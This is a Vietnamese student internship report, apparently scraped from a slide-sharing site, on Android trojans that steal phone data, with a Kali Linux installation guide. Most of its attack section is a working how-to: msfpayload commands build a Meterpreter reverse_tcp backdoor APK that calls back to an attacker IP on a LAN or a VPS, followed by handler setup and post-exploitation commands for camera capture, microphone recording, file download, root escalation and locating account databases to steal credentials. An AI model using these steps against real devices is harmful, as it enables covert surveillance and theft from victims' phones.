BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử
dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công
bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản
BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà
bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với
BackTrack, Kali có rất nhiều cải tiến:
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ
phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được
các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật
(up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ
thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc
thay đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc
ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể
build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ
trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB
Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng
không dây.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao
diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME,
KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành
Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều
phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ
dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không
phải cài lại mới hoàn toàn nữa
5.2 Cài đặt Kali Linux trên máy ảo VMWare
Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này
ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm
trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.
Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên
cửa sổ mới mở, chọn custom và nhấn next
Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước
đó:
Đặt tên và đặt đường dẫn cho máy ảo
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định.
Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường...
Tiếp theo chọn Root password, luôn nhớ Root password đã chọn!
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Phần Partition chọn Guided – use entire disk và All files in one partition
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Chọn Finish partitioning and write changes to disk
Chọn Yes
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Nhấn continue để bắt đầu cài đặt khoảng 15 phút.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và
password đã đặt ở phần trước.
Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
5.3 Tạo mã độc trên Kali Linux để xâm nhập Android
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android
tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali
Linux bằng Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Bấm vào Network Adapter và chọn Bridged: connection directly to the physical
network
Bấm vào Edit -> Virtual Network Editor...
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của
máy thật
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở terminal và gõ dòng lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R >
/root/Desktop/files.apk
192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của
máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit
reverse tcp backdoor.
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ
lệnh sau:
use exploit/multi/handler
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện
như dưới, nhấp vào nút reverse_tcp:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
Để xem thông tin về máy, nhập lệnh SysInfo
 Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước. Ví dụ như sau:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root
của máy
 Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
 Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Dùng lệnh cd /sdcard/Download để vào thư mục
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
II. THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET
1.TRIỂN KHAI LÊN VPS
1.1 Cài đặt Metasploit lên VPS
1. Giới thiệu
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn
công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối
tượng Perl, với những components được viết bằng C, assembler, và Python.
Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
2. Cài đặt
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn
phiên bản Community miễn phí và dùng cho nghiên cứu.
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm
khác.
Chọn folder
cài đặt:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:
Chọn server và ngày hết hạn, để mặc định:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Quá trình cài đặt của Metasploit:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Sau khi Finish trình duyệt web mở lên và đi tới giao diện
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn
Create Account:
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET
Các bước thực hiện
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android
như trên mang Lan với địa chỉ IP là địa chỉ của VPS
Chúng ta vẫn sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp
lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” ở đây địa chỉ
VPS là 14.0.21.132
2. Khởi động Metasploit Console trên VPS
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây
chỉ khác là sử dụng chính IP của VPS
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
5. Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Để xem các lệnh ta gõ help
Để xem thông tin về máy, nhập lệnh SysInfo
Để xem các tác vụ đang chạy gõ ps
Xem ip gõ ipconfig
Xem danh sách thư mục, file gõ ls
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước.
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
Lấy file từ sd card
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Dùng lệnh cd /sdcard/Download để vào thư mục
Để tải về máy, ta nhập lệnh
Download App.apk
để upload gõ lệnh upload
Và file này sẽ được tải về thư mục root của máy Kali
Gõ shell để vào lệnh
kiểm tra xem có root chưa gõ
su
whoami
Nếu báo unknown id is 0 tức là đã root
ls -l danh mục file và các quyền
cd để chuyển hướng thư mục
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
để xem danh sách và down load các file hay thay đổi các file trong ROM
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
^C để quay lại
Sử dụng SQLite để mở file db
Báo Cáo Thực Tập
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
SVTH: Nguyễn Duy Tín
KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP
Những kiến thức lý thuyết đã được củng cố:
 Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android
 Tìm hiểu về hệ điều hành Kali Linux
 Tìm hiểu về các lỗ hổng bảo mật của Windows và Android
 Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng
Những kỹ năng thực hành đã được học thêm:
 Thực hiện cài đặt Android trên máy ảo
 Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và
Android
 Thi lấy chứng chỉ System Hacking của trung tâm Athena
 Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android
 Biết thêm về một số bài học trong lớp Hacker mũ trắng
Những kinh nghiệm thực tiễn đã tích lũy được:
Qua gần 3 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ
nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên
cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh
nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông
qua các kĩ năng giao tiếp và ứng xử.

More Related Content

Similar to Báo cáo thực tập doanh nghiệp

Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập AthenaTín Anh
 
Bao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENABao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENAThongErik
 
Báo Cáo Giữa Kì Thực Tập
Báo Cáo Giữa Kì Thực TậpBáo Cáo Giữa Kì Thực Tập
Báo Cáo Giữa Kì Thực TậpTín Anh
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
BaocaothuctapcuoikyTrần Nam
 
Bao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang VanBao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang VanNguyễn Vân
 
Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA
Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA
Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA Bui Ngoc Tam
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
BaocaothuctapcuoikyTrần Nam
 
Giải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóa
Giải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóaGiải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóa
Giải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóasunflower_micro
 
Bctt
BcttBctt
BcttLIL55
 
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena kid zack
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapThu Hien
 
Ứng dụng AR trên ARtoolkit + Nodejs
Ứng dụng AR trên ARtoolkit + NodejsỨng dụng AR trên ARtoolkit + Nodejs
Ứng dụng AR trên ARtoolkit + NodejsIvan Nguyen
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
BaocaothuctapcuoikyVăn Tiến
 
Bao cao ck update lan 1
Bao cao ck update lan 1Bao cao ck update lan 1
Bao cao ck update lan 1Duy Nguyen
 

Similar to Báo cáo thực tập doanh nghiệp (20)

Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Bao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENABao cao cuoi ky - ATHENA
Bao cao cuoi ky - ATHENA
 
Báo Cáo Giữa Kì Thực Tập
Báo Cáo Giữa Kì Thực TậpBáo Cáo Giữa Kì Thực Tập
Báo Cáo Giữa Kì Thực Tập
 
Thuc tapathena
Thuc tapathenaThuc tapathena
Thuc tapathena
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
Baocaothuctapcuoiky
 
Bao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang VanBao cao cuoi ki_ Nguyen Dang Van
Bao cao cuoi ki_ Nguyen Dang Van
 
Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA
Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA
Báo Cáo Thực Tập Tốt Nghiệp Tại ATHENA
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
Baocaothuctapcuoiky
 
Giải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóa
Giải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóaGiải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóa
Giải pháp đảm bảo an toàn dữ liệu trên nền tảng ảo hóa
 
Struts 2 và ứng dụng quản lý chất lượng dịch vụ home phone.doc
Struts 2 và ứng dụng quản lý chất lượng dịch vụ home phone.docStruts 2 và ứng dụng quản lý chất lượng dịch vụ home phone.doc
Struts 2 và ứng dụng quản lý chất lượng dịch vụ home phone.doc
 
Bctt
BcttBctt
Bctt
 
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
Báo Cáo Thực Tập Tốt Nghiệp Tại Athena
 
Nguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctapNguyenthithuhien_baocaothuctap
Nguyenthithuhien_baocaothuctap
 
Ứng dụng AR trên ARtoolkit + Nodejs
Ứng dụng AR trên ARtoolkit + NodejsỨng dụng AR trên ARtoolkit + Nodejs
Ứng dụng AR trên ARtoolkit + Nodejs
 
Athena.report
Athena.reportAthena.report
Athena.report
 
Phát triển thương mại điện tử vùng kinh tế trọng điểm miền Trung
Phát triển thương mại điện tử vùng kinh tế trọng điểm miền TrungPhát triển thương mại điện tử vùng kinh tế trọng điểm miền Trung
Phát triển thương mại điện tử vùng kinh tế trọng điểm miền Trung
 
Phát triển thương mại điện tử trong các doanh nghiệp ở miền Trung
Phát triển thương mại điện tử trong các doanh nghiệp ở miền TrungPhát triển thương mại điện tử trong các doanh nghiệp ở miền Trung
Phát triển thương mại điện tử trong các doanh nghiệp ở miền Trung
 
Nâng Cao Năng Lực Cạnh Tranh Của Vinaphone Tại Thừa Thiên Huế
Nâng Cao Năng Lực Cạnh Tranh Của Vinaphone Tại Thừa Thiên HuếNâng Cao Năng Lực Cạnh Tranh Của Vinaphone Tại Thừa Thiên Huế
Nâng Cao Năng Lực Cạnh Tranh Của Vinaphone Tại Thừa Thiên Huế
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
Baocaothuctapcuoiky
 
Bao cao ck update lan 1
Bao cao ck update lan 1Bao cao ck update lan 1
Bao cao ck update lan 1
 

Báo cáo thực tập doanh nghiệp

  • 1. Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN KHOA KỸ THUẬT MÁY TÍNH -------------------------------- BÁO CÁO ĐỀ TÀI THỰC TẬP NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN DUY TÍN MSSV: 10520044 LỚP : KTMT05
